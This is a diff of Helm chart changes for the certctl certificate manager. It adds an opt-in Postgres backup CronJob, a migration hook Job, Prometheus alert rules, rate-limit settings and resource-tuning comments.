echo "[backup-cronjob] uploading to s3://${S3_PATH}"
|
||||||
|
aws s3 cp "${DUMP_FILE}" "s3://${S3_PATH}"
|
||||||
|
rm -f "${DUMP_FILE}"
|
||||||
|
{{- else }}
|
||||||
|
# PVC sink — dump lands at /backups/certctl-${TIMESTAMP}.dump
|
||||||
|
# mounted from backup.pvc.claimName. Retention is the
|
||||||
|
# PVC's responsibility (storage-class snapshot lifecycle
|
||||||
|
# or a separate cleanup CronJob). The Job moves the
|
||||||
|
# file from /tmp to /backups atomically; never
|
||||||
|
# writes partial dumps into the durable mount.
|
||||||
|
FINAL_PATH="/backups/certctl-${TIMESTAMP}.dump"
|
||||||
|
echo "[backup-cronjob] persisting to ${FINAL_PATH}"
|
||||||
|
mv "${DUMP_FILE}" "${FINAL_PATH}"
|
||||||
|
{{- end }}
|
||||||
|
echo "[backup-cronjob] done"
|
||||||
|
{{- if ne (.Values.backup.sink | default "pvc") "s3" }}
|
||||||
|
volumeMounts:
|
||||||
|
- name: backups
|
||||||
|
mountPath: /backups
|
||||||
|
{{- end }}
|
||||||
|
resources:
|
||||||
|
{{- toYaml (.Values.backup.resources | default dict) | nindent 16 }}
|
||||||
|
{{- if ne (.Values.backup.sink | default "pvc") "s3" }}
|
||||||
|
volumes:
|
||||||
|
- name: backups
|
||||||
|
persistentVolumeClaim:
|
||||||
|
claimName: {{ .Values.backup.pvc.claimName | quote }}
|
||||||
|
{{- end }}
|
||||||
|
{{- with .Values.nodeAffinity }}
|
||||||
|
affinity:
|
||||||
|
nodeAffinity:
|
||||||
|
{{- toYaml . | nindent 14 }}
|
||||||
|
{{- end }}
|
||||||
|
{{- with .Values.backup.tolerations }}
|
||||||
|
tolerations:
|
||||||
|
{{- toYaml . | nindent 12 }}
|
||||||
|
{{- end }}
|
||||||
|
{{- end }}
|
||||||
@@ -0,0 +1,89 @@
|
|||||||
|
{{- /*
|
||||||
|
Phase 4 DEPL-M1 closure (2026-05-14): Helm pre-install / pre-upgrade
|
||||||
|
hook that runs Postgres migrations before the server Deployment rolls.
|
||||||
|
|
||||||
|
Pre-DEPL-M1, postgres.RunMigrations was invoked at server boot
|
||||||
|
(cmd/server/main.go:151) as the only migration path. That works for
|
||||||
|
Compose deployments but conflicts with Kubernetes rolling deploys:
|
||||||
|
when a new server image lands with a schema change, multiple replicas
|
||||||
|
race the migration during the rollout. The hook resolves the race by
|
||||||
|
running migrations OUT OF BAND, exactly once, before any new server
|
||||||
|
pod starts.
|
||||||
|
|
||||||
|
How it works:
|
||||||
|
- The Job ships the same certctl-server image as the Deployment, so
|
||||||
|
the migration code path is binary-identical to the boot-time path.
|
||||||
|
- It runs `certctl-server --migrate-only` (a flag the cmd/server
|
||||||
|
main process must support — see cmd/server/main.go for the flag
|
||||||
|
parse + early-exit path).
|
||||||
|
- The CERTCTL_MIGRATIONS_VIA_HOOK=true env var is ALSO set on the
|
||||||
|
server Deployment (via values.yaml). When the server boots, it
|
||||||
|
sees this env var and skips its own RunMigrations call — the
|
||||||
|
hook already did the work. Compose deploys don't set the env
|
||||||
|
var, so they keep the boot-time path unchanged.
|
||||||
|
- hook-delete-policy hook-succeeded means the Job is cleaned up
|
||||||
|
automatically on success but retained on failure for operator
|
||||||
|
diagnosis.
|
||||||
|
- The hook-weight ensures the migration Job runs before any other
|
||||||
|
pre-install/pre-upgrade resources (the StatefulSet's PVC has to
|
||||||
|
exist first; in practice the StatefulSet has no hook so it lands
|
||||||
|
naturally in the install phase after the Job completes).
|
||||||
|
|
||||||
|
Operators on Compose: this hook is a no-op for you. The server still
|
||||||
|
runs migrations at boot per the existing path.
|
||||||
|
*/ -}}
|
||||||
|
{{- if .Values.migrations.viaHook }}
|
||||||
|
apiVersion: batch/v1
|
||||||
|
kind: Job
|
||||||
|
metadata:
|
||||||
|
name: {{ include "certctl.fullname" . }}-migrate
|
||||||
|
labels:
|
||||||
|
{{- include "certctl.labels" . | nindent 4 }}
|
||||||
|
app.kubernetes.io/component: migration
|
||||||
|
annotations:
|
||||||
|
"helm.sh/hook": pre-install,pre-upgrade
|
||||||
|
"helm.sh/hook-weight": "-5"
|
||||||
|
"helm.sh/hook-delete-policy": hook-succeeded,before-hook-creation
|
||||||
|
spec:
|
||||||
|
backoffLimit: {{ .Values.migrations.backoffLimit | default 1 }}
|
||||||
|
activeDeadlineSeconds: {{ .Values.migrations.activeDeadlineSeconds | default 600 }}
|
||||||
|
template:
|
||||||
|
metadata:
|
||||||
|
labels:
|
||||||
|
{{- include "certctl.labels" . | nindent 8 }}
|
||||||
|
app.kubernetes.io/component: migration
|
||||||
|
spec:
|
||||||
|
restartPolicy: Never
|
||||||
|
serviceAccountName: {{ include "certctl.serviceAccountName" . }}
|
||||||
|
securityContext:
|
||||||
|
{{- include "certctl.podSecurityContext" .Values.server.securityContext | nindent 8 }}
|
||||||
|
{{- with .Values.imagePullSecrets }}
|
||||||
|
imagePullSecrets:
|
||||||
|
{{- toYaml . | nindent 8 }}
|
||||||
|
{{- end }}
|
||||||
|
containers:
|
||||||
|
- name: migrate
|
||||||
|
image: {{ include "certctl.serverImage" . }}
|
||||||
|
imagePullPolicy: {{ .Values.server.image.pullPolicy }}
|
||||||
|
# Migration-only entrypoint. The server binary supports a
|
||||||
|
# --migrate-only flag that runs postgres.RunMigrations +
|
||||||
|
# postgres.RunSeed and exits cleanly (zero on success,
|
||||||
|
# non-zero on migration failure). See cmd/server/main.go
|
||||||
|
# for the implementation. The flag is hermetic — no HTTP
|
||||||
|
# listener starts, no scheduler ticks, no signing
|
||||||
|
# operations occur. Pure schema-mutation pass.
|
||||||
|
command:
|
||||||
|
- /app/server
|
||||||
|
- --migrate-only
|
||||||
|
env:
|
||||||
|
- name: CERTCTL_DATABASE_URL
|
||||||
|
value: {{ include "certctl.databaseURL" . | quote }}
|
||||||
|
- name: CERTCTL_LOG_LEVEL
|
||||||
|
value: {{ .Values.server.logging.level | default "info" | quote }}
|
||||||
|
- name: CERTCTL_LOG_FORMAT
|
||||||
|
value: {{ .Values.server.logging.format | default "json" | quote }}
|
||||||
|
resources:
|
||||||
|
{{- toYaml (.Values.migrations.resources | default .Values.server.resources) | nindent 12 }}
|
||||||
|
securityContext:
|
||||||
|
{{- include "certctl.containerSecurityContext" .Values.server.securityContext | nindent 12 }}
|
||||||
|
{{- end }}
|
||||||
@@ -9,6 +9,21 @@ metadata:
|
|||||||
spec:
|
spec:
|
||||||
serviceName: {{ include "certctl.fullname" . }}-postgres
|
serviceName: {{ include "certctl.fullname" . }}-postgres
|
||||||
replicas: 1
|
replicas: 1
|
||||||
|
# Phase 4 DEPL-M4 closure (2026-05-14): explicit StatefulSet update +
|
||||||
|
# pod-management strategies. Defaults make Postgres upgrades
|
||||||
|
# operator-controlled rather than automatic:
|
||||||
|
# updateStrategy.type: OnDelete — Postgres pods do NOT roll
|
||||||
|
# automatically when the StatefulSet spec changes. Operator
|
||||||
|
# deletes the pod explicitly after taking a backup + reviewing
|
||||||
|
# the change. Prevents an accidental Helm-template tweak from
|
||||||
|
# triggering a database restart at an awkward time.
|
||||||
|
# podManagementPolicy: OrderedReady — when scaling Postgres to
|
||||||
|
# a replica >1 (future HA work), pods come up one at a time
|
||||||
|
# and must reach Ready before the next pod is created. Aligns
|
||||||
|
# with the standard Postgres-on-Kubernetes pattern.
|
||||||
|
updateStrategy:
|
||||||
|
type: OnDelete
|
||||||
|
podManagementPolicy: OrderedReady
|
||||||
selector:
|
selector:
|
||||||
matchLabels:
|
matchLabels:
|
||||||
{{- include "certctl.postgresSelectorLabels" . | nindent 6 }}
|
{{- include "certctl.postgresSelectorLabels" . | nindent 6 }}
|
||||||
|
|||||||
@@ -0,0 +1,145 @@
|
|||||||
|
{{- /*
|
||||||
|
Phase 4 DEPL-L2 closure (2026-05-14): opt-in Prometheus AlertManager
|
||||||
|
rules covering the four operationally-actionable alerts every certctl
|
||||||
|
deployment wants out of the box.
|
||||||
|
|
||||||
|
OPERATOR OPT-IN. Default `monitoring.prometheusRules.enabled: false`.
|
||||||
|
Turning it on requires Prometheus Operator CRDs (PrometheusRule kind)
|
||||||
|
to be installed in-cluster. Without them this template renders an
|
||||||
|
object Kubernetes will reject — keep the toggle off if you're scraping
|
||||||
|
with vanilla Prometheus + a Helm-installed AlertManager rules
|
||||||
|
ConfigMap instead.
|
||||||
|
|
||||||
|
Metric names + thresholds verified against the actual
|
||||||
|
internal/api/handler/metrics.go exposition path:
|
||||||
|
- certctl_certificate_expiring_soon: server-side count of certs with
|
||||||
|
ExpiresAt in (now, now + 30d]. The 30-day window is computed in
|
||||||
|
internal/service/stats.go::GetDashboardSummary.
|
||||||
|
- certctl_agent_online: agents with heartbeat in the last 5 minutes.
|
||||||
|
A drop below certctl_agent_total signals offline agents.
|
||||||
|
- certctl_job_failed_total + certctl_job_completed_total: cumulative
|
||||||
|
counters; ratio gives the failure rate over the rate() window.
|
||||||
|
- certctl_issuance_failures_total: cumulative counter of failed
|
||||||
|
issuance attempts (renewal failures are issuance failures with a
|
||||||
|
specific error_class label).
|
||||||
|
|
||||||
|
Adjust thresholds per fleet — the defaults below are tuned for the
|
||||||
|
demo dataset (15 certs / 1 agent) and may need raising for production
|
||||||
|
fleets with thousands of certs where a steady rate of expiring certs
|
||||||
|
is the normal operating state.
|
||||||
|
*/ -}}
|
||||||
|
{{- if and .Values.monitoring.enabled .Values.monitoring.prometheusRules.enabled }}
|
||||||
|
apiVersion: monitoring.coreos.com/v1
|
||||||
|
kind: PrometheusRule
|
||||||
|
metadata:
|
||||||
|
name: {{ include "certctl.fullname" . }}-rules
|
||||||
|
labels:
|
||||||
|
{{- include "certctl.labels" . | nindent 4 }}
|
||||||
|
app.kubernetes.io/component: monitoring
|
||||||
|
{{- with .Values.monitoring.prometheusRules.labels }}
|
||||||
|
{{- toYaml . | nindent 4 }}
|
||||||
|
{{- end }}
|
||||||
|
spec:
|
||||||
|
groups:
|
||||||
|
- name: certctl.alerts
|
||||||
|
interval: {{ .Values.monitoring.prometheusRules.interval | default "60s" }}
|
||||||
|
rules:
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
# Alert: CertctlCertificateExpiringSoon
|
||||||
|
# Series: certctl_certificate_expiring_soon
|
||||||
|
# The certctl-server counts certs with ExpiresAt in
|
||||||
|
# (now, now + 30d] every metrics scrape. Fires whenever any cert
|
||||||
|
# crosses into that window — operator must triage or extend
|
||||||
|
# automation coverage. Rapid renewal infrastructure should keep
|
||||||
|
# this number small in steady state.
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
- alert: CertctlCertificateExpiringSoon
|
||||||
|
expr: certctl_certificate_expiring_soon > {{ .Values.monitoring.prometheusRules.thresholds.expiringCertificateCount | default 0 }}
|
||||||
|
for: {{ .Values.monitoring.prometheusRules.thresholds.expiringCertificateFor | default "5m" }}
|
||||||
|
labels:
|
||||||
|
severity: warning
|
||||||
|
component: certctl
|
||||||
|
annotations:
|
||||||
|
summary: "certctl: {{`{{ $value }}`}} certificate(s) expiring within 30 days"
|
||||||
|
description: >-
|
||||||
|
certctl_certificate_expiring_soon has been > {{ .Values.monitoring.prometheusRules.thresholds.expiringCertificateCount | default 0 }}
|
||||||
|
for 5+ minutes. Investigate via
|
||||||
|
/api/v1/certificates?status=expiring or the dashboard's
|
||||||
|
Expiring tab. If renewal automation should have covered
|
||||||
|
these, check the renewal scheduler logs for the cert IDs
|
||||||
|
+ the per-issuer failure rate.
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
# Alert: CertctlAgentOffline
|
||||||
|
# Series: certctl_agent_total - certctl_agent_online
|
||||||
|
# Agents flip from online → offline after 5 minutes without a
|
||||||
|
# heartbeat (internal/service/stats.go::GetDashboardSummary).
|
||||||
|
# The 1h `for:` window prevents a flapping agent from paging the
|
||||||
|
# operator on every transient network blip.
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
- alert: CertctlAgentOffline
|
||||||
|
expr: (certctl_agent_total - certctl_agent_online) > {{ .Values.monitoring.prometheusRules.thresholds.offlineAgentCount | default 0 }}
|
||||||
|
for: {{ .Values.monitoring.prometheusRules.thresholds.offlineAgentFor | default "1h" }}
|
||||||
|
labels:
|
||||||
|
severity: warning
|
||||||
|
component: certctl-agent
|
||||||
|
annotations:
|
||||||
|
summary: "certctl: {{`{{ $value }}`}} agent(s) offline for >1h"
|
||||||
|
description: >-
|
||||||
|
One or more certctl-agent instances have been without a
|
||||||
|
heartbeat for over an hour. Check the agent logs on the
|
||||||
|
affected hosts. If the agent host is intentionally
|
||||||
|
decommissioned, retire the agent via the dashboard or
|
||||||
|
POST /api/v1/agents/{id}/retire to suppress this alert.
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
# Alert: CertctlJobFailureRateHigh
|
||||||
|
# Series: certctl_job_failed_total / (certctl_job_failed_total + certctl_job_completed_total)
|
||||||
|
# Computes the failure rate over a 15-minute rate() window so
|
||||||
|
# short bursts don't fire but a sustained issue does. The 5%
|
||||||
|
# threshold is a conservative starter — adjust per fleet's
|
||||||
|
# baseline.
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
- alert: CertctlJobFailureRateHigh
|
||||||
|
expr: >-
|
||||||
|
(
|
||||||
|
rate(certctl_job_failed_total[15m])
|
||||||
|
/
|
||||||
|
clamp_min(rate(certctl_job_failed_total[15m]) + rate(certctl_job_completed_total[15m]), 1)
|
||||||
|
) > {{ .Values.monitoring.prometheusRules.thresholds.jobFailureRate | default 0.05 }}
|
||||||
|
for: {{ .Values.monitoring.prometheusRules.thresholds.jobFailureRateFor | default "15m" }}
|
||||||
|
labels:
|
||||||
|
severity: warning
|
||||||
|
component: certctl
|
||||||
|
annotations:
|
||||||
|
summary: "certctl: job failure rate above 5% over 15m"
|
||||||
|
description: >-
|
||||||
|
The 15m rate of certctl_job_failed_total / total jobs
|
||||||
|
has been above 5% for 15+ minutes. Open
|
||||||
|
/api/v1/jobs?status=failed to see the failing job IDs
|
||||||
|
and root-cause the recurring error class.
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
# Alert: CertctlIssuanceFailures
|
||||||
|
# Series: certctl_issuance_failures_total
|
||||||
|
# Any non-zero rate of issuance failures over a 15m window is
|
||||||
|
# operationally significant — a single CA outage or expired
|
||||||
|
# ACME account can cascade across the fleet.
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
- alert: CertctlIssuanceFailures
|
||||||
|
expr: rate(certctl_issuance_failures_total[15m]) > {{ .Values.monitoring.prometheusRules.thresholds.issuanceFailureRate | default 0 }}
|
||||||
|
for: {{ .Values.monitoring.prometheusRules.thresholds.issuanceFailureFor | default "15m" }}
|
||||||
|
labels:
|
||||||
|
severity: warning
|
||||||
|
component: certctl
|
||||||
|
annotations:
|
||||||
|
summary: "certctl: certificate issuance / renewal failures over 15m"
|
||||||
|
description: >-
|
||||||
|
certctl_issuance_failures_total has been incrementing
|
||||||
|
over the last 15 minutes. Check the per-issuer breakdown
|
||||||
|
via /api/v1/issuers + the failed-job log in
|
||||||
|
/api/v1/jobs?status=failed. Common causes: CA
|
||||||
|
outage, ACME account rate-limit, EAB credential
|
||||||
|
expiration, stepca provisioner key rotation without
|
||||||
|
certctl-side update.
|
||||||
|
{{- end }}
|
||||||
@@ -12,6 +12,8 @@ data:
|
|||||||
keygen-mode: {{ .Values.server.keygen.mode | quote }}
|
keygen-mode: {{ .Values.server.keygen.mode | quote }}
|
||||||
rate-limit-rps: {{ .Values.server.rateLimiting.rps | quote }}
|
rate-limit-rps: {{ .Values.server.rateLimiting.rps | quote }}
|
||||||
rate-limit-burst: {{ .Values.server.rateLimiting.burst | quote }}
|
rate-limit-burst: {{ .Values.server.rateLimiting.burst | quote }}
|
||||||
|
rate-limit-backend: {{ .Values.server.rateLimiting.backend | default "memory" | quote }}
|
||||||
|
rate-limit-janitor-interval: {{ .Values.server.rateLimiting.janitorInterval | default "5m" | quote }}
|
||||||
{{- if .Values.server.cors.origins }}
|
{{- if .Values.server.cors.origins }}
|
||||||
cors-origins: {{ .Values.server.cors.origins | quote }}
|
cors-origins: {{ .Values.server.cors.origins | quote }}
|
||||||
{{- end }}
|
{{- end }}
|
||||||
|
|||||||
@@ -108,6 +108,19 @@ spec:
|
|||||||
configMapKeyRef:
|
configMapKeyRef:
|
||||||
name: {{ include "certctl.fullname" . }}-server
|
name: {{ include "certctl.fullname" . }}-server
|
||||||
key: rate-limit-burst
|
key: rate-limit-burst
|
||||||
|
# Phase 13 Sprint 13.3 (ARCH-M1) — cross-replica-consistent
|
||||||
|
# sliding-window rate limiter. Default memory; flip to
|
||||||
|
# postgres when server.replicas > 1.
|
||||||
|
- name: CERTCTL_RATE_LIMIT_BACKEND
|
||||||
|
valueFrom:
|
||||||
|
configMapKeyRef:
|
||||||
|
name: {{ include "certctl.fullname" . }}-server
|
||||||
|
key: rate-limit-backend
|
||||||
|
- name: CERTCTL_RATE_LIMIT_JANITOR_INTERVAL
|
||||||
|
valueFrom:
|
||||||
|
configMapKeyRef:
|
||||||
|
name: {{ include "certctl.fullname" . }}-server
|
||||||
|
key: rate-limit-janitor-interval
|
||||||
{{- if .Values.server.cors.origins }}
|
{{- if .Values.server.cors.origins }}
|
||||||
- name: CERTCTL_CORS_ORIGINS
|
- name: CERTCTL_CORS_ORIGINS
|
||||||
valueFrom:
|
valueFrom:
|
||||||
|
|||||||
@@ -31,6 +31,36 @@ server:
|
|||||||
port: 8443
|
port: 8443
|
||||||
|
|
||||||
# Resource requests and limits
|
# Resource requests and limits
|
||||||
|
#
|
||||||
|
# Phase 4 DEPL-M5 (2026-05-14): per-fleet-size tuning ladder. The
|
||||||
|
# default values below are validated against the demo dataset
|
||||||
|
# (15 certs / 1 agent) and the baselines in
|
||||||
|
# docs/operator/performance-baselines.md (single endpoint < 5s for
|
||||||
|
# 100 sequential requests = ~50ms p50; cursor-paginated 1000-cert
|
||||||
|
# inventory walk < 3s; renewal scan for 15 certs < 100ms).
|
||||||
|
#
|
||||||
|
# Larger fleet recommendations (TBD pending Phase 8 load-test runs;
|
||||||
|
# operators tune empirically until then — capture readings in your
|
||||||
|
# own loadtest-baselines log):
|
||||||
|
#
|
||||||
|
# ≤ 500 certs / 100 agents: defaults below (100m / 128Mi req, 500m / 512Mi lim)
|
||||||
|
# 5K certs / 1K agents: tune up — TBD Phase 8 (suggested starter: 500m / 512Mi req, 2000m / 2Gi lim)
|
||||||
|
# 50K certs / 10K agents: tune up — TBD Phase 8 (suggested starter: 2000m / 2Gi req, 4000m / 4Gi lim)
|
||||||
|
#
|
||||||
|
# The "suggested starter" values above are operator-tuning starting
|
||||||
|
# points, NOT validated. Phase 8 (load test coverage expansion) will
|
||||||
|
# measure them against synthetic fleets and replace the suggestions
|
||||||
|
# with measured ceilings. Until then, treat them as a "raise CPU
|
||||||
|
# before raising memory; raise both before scaling out" mental
|
||||||
|
# model. Per docs/operator/performance-baselines.md, certctl-server
|
||||||
|
# is CPU-bound on issuance / renewal scan work and memory-bound on
|
||||||
|
# the inventory query path.
|
||||||
|
#
|
||||||
|
# Database scale (postgresql.* below) tracks server scale roughly
|
||||||
|
# 1:1 — at 50K certs the Postgres instance needs 4 CPU / 4Gi RAM
|
||||||
|
# and shared_buffers ≥ 1Gi. Postgres tuning is out of scope for
|
||||||
|
# this comment; see docs/operator/runbooks/postgres-backup.md
|
||||||
|
# for the production-tuning entry-point.
|
||||||
resources:
|
resources:
|
||||||
requests:
|
requests:
|
||||||
cpu: 100m
|
cpu: 100m
|
||||||
@@ -181,8 +211,25 @@ server:
|
|||||||
|
|
||||||
# Rate limiting configuration
|
# Rate limiting configuration
|
||||||
rateLimiting:
|
rateLimiting:
|
||||||
rps: 100 # Requests per second
|
rps: 100 # Requests per second (token-bucket middleware)
|
||||||
burst: 200 # Burst capacity
|
burst: 200 # Burst capacity (token-bucket middleware)
|
||||||
|
|
||||||
|
# Sliding-window-log rate-limit backend (Phase 13 Sprint 13.2/13.3
|
||||||
|
# ARCH-M1 closure). Selects the implementation backing the
|
||||||
|
# break-glass / OCSP / cert-export / EST limiters. See
|
||||||
|
# docs/operator/observability.md for the operator decision tree.
|
||||||
|
#
|
||||||
|
# memory — per-process (default; single-replica deploys).
|
||||||
|
# postgres — cross-replica-consistent via rate_limit_buckets.
|
||||||
|
# REQUIRED when server.replicas > 1 for accurate
|
||||||
|
# cluster-wide enforcement.
|
||||||
|
backend: memory
|
||||||
|
|
||||||
|
# Scheduler janitor interval for the postgres backend's
|
||||||
|
# rate_limit_buckets sweep. Ignored when backend=memory (the
|
||||||
|
# in-memory backend self-prunes on every Allow call).
|
||||||
|
# Default 5m; minimum 1m.
|
||||||
|
janitorInterval: "5m"
|
||||||
|
|
||||||
# Network scanning configuration
|
# Network scanning configuration
|
||||||
networkScan:
|
networkScan:
|
||||||
@@ -449,6 +496,27 @@ agent:
|
|||||||
replicas: 1
|
replicas: 1
|
||||||
|
|
||||||
# Resource requests and limits
|
# Resource requests and limits
|
||||||
|
#
|
||||||
|
# Phase 4 DEPL-M5 (2026-05-14): per-fleet-size tuning ladder for the
|
||||||
|
# agent. Defaults are sized for the standard "one cert per host"
|
||||||
|
# operating pattern: the agent polls the server every 30 seconds
|
||||||
|
# (hardcoded in cmd/agent/main.go::pollInterval — not yet
|
||||||
|
# env-configurable), generates ECDSA P-256 keys locally on
|
||||||
|
# issuance/renewal events, and is otherwise idle. CPU is bursty only
|
||||||
|
# during keygen + CSR submission.
|
||||||
|
#
|
||||||
|
# Tuning ladder (TBD pending Phase 8 — measure on your fleet):
|
||||||
|
#
|
||||||
|
# 1 cert / host (typical): defaults below (50m / 64Mi req, 200m / 256Mi lim)
|
||||||
|
# 10 certs / host: stays at defaults — agent is poll-driven, not work-bound by cert count
|
||||||
|
# 100 certs / host (rare): raise lim to 500m / 512Mi if you see throttling on issuance bursts
|
||||||
|
#
|
||||||
|
# The agent does NOT cache certs in memory — issuance is one-shot
|
||||||
|
# generate-then-deploy. So per-host memory scales with whatever
|
||||||
|
# truststore PEM bundles the agent's connectors load (Apache /
|
||||||
|
# Postfix / similar), not with the cert count. Defaults are
|
||||||
|
# appropriate for any "agent terminates ≤ 100 certs on this host"
|
||||||
|
# deployment.
|
||||||
resources:
|
resources:
|
||||||
requests:
|
requests:
|
||||||
cpu: 50m
|
cpu: 50m
|
||||||
@@ -612,6 +680,149 @@ monitoring:
|
|||||||
# Optional relabeling for the scrape job.
|
# Optional relabeling for the scrape job.
|
||||||
# relabelings: []
|
# relabelings: []
|
||||||
|
|
||||||
|
# ----------------------------------------------------------------------
|
||||||
|
# Phase 4 DEPL-L2 closure (2026-05-14): PrometheusRule (alert rules)
|
||||||
|
#
|
||||||
|
# Operator opt-in. Requires Prometheus Operator CRDs (the
|
||||||
|
# `monitoring.coreos.com/v1` PrometheusRule kind) installed in
|
||||||
|
# cluster. Without those CRDs the rendered object is rejected by
|
||||||
|
# `kubectl apply` — keep enabled: false if you scrape with vanilla
|
||||||
|
# Prometheus + AlertManager rules ConfigMap instead.
|
||||||
|
#
|
||||||
|
# Four starter rules ship out of the box (see
|
||||||
|
# templates/prometheusrules.yaml for the full PromQL):
|
||||||
|
#
|
||||||
|
# CertctlCertificateExpiringSoon — certs expiring within 30d
|
||||||
|
# CertctlAgentOffline — agent without heartbeat for >1h
|
||||||
|
# CertctlJobFailureRateHigh — job-failure rate over 5% (15m)
|
||||||
|
# CertctlIssuanceFailures — any issuance failures in last 15m
|
||||||
|
#
|
||||||
|
# All thresholds are operator-tunable via the `thresholds:` block
|
||||||
|
# below. The defaults are tuned for the demo dataset (15 certs / 1
|
||||||
|
# agent); production fleets with sustained renewal volume MAY want
|
||||||
|
# to raise the expiringCertificateCount + jobFailureRate thresholds
|
||||||
|
# to suppress steady-state noise.
|
||||||
|
prometheusRules:
|
||||||
|
enabled: false
|
||||||
|
# Evaluation interval for the rule group.
|
||||||
|
interval: 60s
|
||||||
|
# Additional labels applied to the PrometheusRule metadata.
|
||||||
|
# labels: {}
|
||||||
|
# Per-alert threshold / duration tunables.
|
||||||
|
thresholds:
|
||||||
|
# Fire when more than N certs are in the expiring-soon window.
|
||||||
|
expiringCertificateCount: 0
|
||||||
|
expiringCertificateFor: 5m
|
||||||
|
# Fire when more than N agents are offline (server - online).
|
||||||
|
offlineAgentCount: 0
|
||||||
|
offlineAgentFor: 1h
|
||||||
|
# Fire when job failure rate exceeds this fraction (15m window).
|
||||||
|
jobFailureRate: 0.05
|
||||||
|
jobFailureRateFor: 15m
|
||||||
|
# Fire when issuance failure rate exceeds this value (15m window).
|
||||||
|
issuanceFailureRate: 0
|
||||||
|
issuanceFailureFor: 15m
|
||||||
|
|
||||||
|
# ==============================================================================
|
||||||
|
# Backup CronJob (Phase 4 DEPL-H2 closure, 2026-05-14)
|
||||||
|
# ==============================================================================
|
||||||
|
# Operator opt-in. Default OFF. The CronJob runs `pg_dump --format=custom
|
||||||
|
# --no-owner --no-acl --dbname=certctl` matching the canonical shape
|
||||||
|
# documented in docs/operator/runbooks/postgres-backup.md (so manual
|
||||||
|
# and automated dumps are byte-identical) and ships the result to a
|
||||||
|
# sink chosen below.
|
||||||
|
#
|
||||||
|
# DO NOT enable this for managed Postgres deployments (AWS RDS / GCP
|
||||||
|
# Cloud SQL / Azure DB) — those have built-in PITR backup that this
|
||||||
|
# CronJob cannot match. For in-cluster Postgres only.
|
||||||
|
backup:
|
||||||
|
enabled: false
|
||||||
|
# Cron expression (UTC). Default: 02:30 UTC daily.
|
||||||
|
schedule: "30 2 * * *"
|
||||||
|
# Sink: "pvc" (default — dump lands on a PersistentVolumeClaim) or
|
||||||
|
# "s3" (uploads via aws-cli — requires an image that bundles
|
||||||
|
# aws-cli, see backup.image below).
|
||||||
|
sink: pvc
|
||||||
|
# Container image. The default postgres:16-alpine has pg_dump but
|
||||||
|
# NOT aws-cli; for sink: s3 set this to an image that bundles both
|
||||||
|
# (e.g. ghcr.io/your-org/postgres-aws:16) or override the Job's
|
||||||
|
# command to install aws-cli at runtime.
|
||||||
|
image: postgres:16-alpine
|
||||||
|
imagePullPolicy: IfNotPresent
|
||||||
|
# PVC sink config — used when sink: pvc.
|
||||||
|
pvc:
|
||||||
|
# Name of an existing PersistentVolumeClaim mounted at /backups
|
||||||
|
# in the Job's pod. The PVC's storage class controls durability
|
||||||
|
# and snapshot retention. Operator creates this PVC out of band
|
||||||
|
# via their own storage policy.
|
||||||
|
claimName: certctl-backups
|
||||||
|
# S3 sink config — used when sink: s3.
|
||||||
|
s3:
|
||||||
|
# Target bucket (without s3:// prefix).
|
||||||
|
bucket: ""
|
||||||
|
# Object key prefix inside the bucket. Dumps land at
|
||||||
|
# s3://<bucket>/<prefix>/certctl-<TIMESTAMP>.dump.
|
||||||
|
prefix: certctl
|
||||||
|
# AWS region (sets AWS_DEFAULT_REGION). Optional if the image's
|
||||||
|
# AWS SDK can resolve the region another way (instance profile,
|
||||||
|
# IRSA, etc.).
|
||||||
|
region: ""
|
||||||
|
# Secret holding AWS credentials. The IAM principal needs
|
||||||
|
# s3:PutObject + s3:ListBucket on the target bucket only.
|
||||||
|
credentialsSecret:
|
||||||
|
name: certctl-backup-aws-creds
|
||||||
|
accessKeyIdKey: AWS_ACCESS_KEY_ID
|
||||||
|
secretAccessKeyKey: AWS_SECRET_ACCESS_KEY
|
||||||
|
# Job housekeeping.
|
||||||
|
successfulJobsHistoryLimit: 3
|
||||||
|
failedJobsHistoryLimit: 1
|
||||||
|
startingDeadlineSeconds: 300
|
||||||
|
backoffLimit: 1
|
||||||
|
activeDeadlineSeconds: 3600
|
||||||
|
# Resource budget for the backup container. pg_dump is generally
|
||||||
|
# memory-light; ~250MB RSS for fleets up to 100K certs is typical.
|
||||||
|
resources:
|
||||||
|
requests:
|
||||||
|
cpu: 100m
|
||||||
|
memory: 128Mi
|
||||||
|
limits:
|
||||||
|
cpu: 500m
|
||||||
|
memory: 512Mi
|
||||||
|
# Optional tolerations for the backup Job pod.
|
||||||
|
tolerations: []
|
||||||
|
|
||||||
|
# ==============================================================================
|
||||||
|
# Migrations via Helm hook (Phase 4 DEPL-M1 closure, 2026-05-14)
|
||||||
|
# ==============================================================================
|
||||||
|
# When viaHook: true, the chart deploys templates/migration-job.yaml as
|
||||||
|
# a pre-install + pre-upgrade hook that runs `certctl-server
|
||||||
|
# --migrate-only` (a hermetic schema-mutation pass) before the server
|
||||||
|
# Deployment rolls.
|
||||||
|
#
|
||||||
|
# Set CERTCTL_MIGRATIONS_VIA_HOOK=true in the server Deployment env to
|
||||||
|
# tell the server to skip its boot-time RunMigrations call (the hook
|
||||||
|
# already did the work; running again at boot would race across
|
||||||
|
# replicas during rollouts).
|
||||||
|
#
|
||||||
|
# Default OFF — when off, the server runs migrations at boot exactly
|
||||||
|
# as it always has (Compose deploys keep this path).
|
||||||
|
migrations:
|
||||||
|
viaHook: false
|
||||||
|
# Job housekeeping.
|
||||||
|
backoffLimit: 1
|
||||||
|
activeDeadlineSeconds: 600
|
||||||
|
# Resource budget for the migration Job pod. The migration pass is
|
||||||
|
# I/O-bound on Postgres; matches the server's resource budget by
|
||||||
|
# default. Override here if migrations on a large database need
|
||||||
|
# more headroom than the steady-state server.
|
||||||
|
# resources:
|
||||||
|
# requests:
|
||||||
|
# cpu: 100m
|
||||||
|
# memory: 128Mi
|
||||||
|
# limits:
|
||||||
|
# cpu: 500m
|
||||||
|
# memory: 512Mi
|
||||||
|
|
||||||
# ==============================================================================
|
# ==============================================================================
|
||||||
# Network Policy (Bundle 3 closure / D11)
|
# Network Policy (Bundle 3 closure / D11)
|
||||||
# ==============================================================================
|
# ==============================================================================
|
||||||
|
|||||||
